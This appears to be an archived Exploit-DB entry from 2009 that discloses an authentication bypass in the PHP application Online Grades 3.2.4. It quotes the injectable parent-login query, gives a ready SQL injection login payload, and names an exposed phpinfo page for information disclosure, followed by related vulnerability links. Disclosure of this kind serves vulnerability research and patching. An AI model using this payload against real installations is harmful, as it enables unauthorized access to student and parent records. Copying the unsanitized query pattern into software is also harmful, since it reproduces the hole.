Lucene search
X0rEDB-ID:7956HistoryFeb 03, 2009 - 12:00 a.m.
Online Grades 3.2.4 - Authentication Bypass
2009-02-0300:00:00
x0r
www.exploit-db.com
34
#########################################################################################
[0x01] Informations:
Script : Online Grades 3.2.4
Download : http://www.onlinegrades.org
Vulnerability : Auth Bypass - Php Info Disclosure
Author : x0r
Contact : [email protected] \ [email protected]
Website : NULL
#########################################################################################
[0x02] Bug: /parents/login.php
$username = $_POST['uname']; $pword = $_POST['pass'];
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";
#########################################################################################
[0x03] Exploit:
Exploit: [validemail] ' or ' 1=1--
Php Info: /includes/phpinfo.php
#########################################################################################
# milw0rm.com [2009-02-03]Related
prion
prion
Sql injection
2009-02-09 01:30:00
Information disclosure
2009-02-10 07:00:00
Sql injection
2009-02-10 07:00:00
nvd
nvd
cve
cve
cvelist
cvelist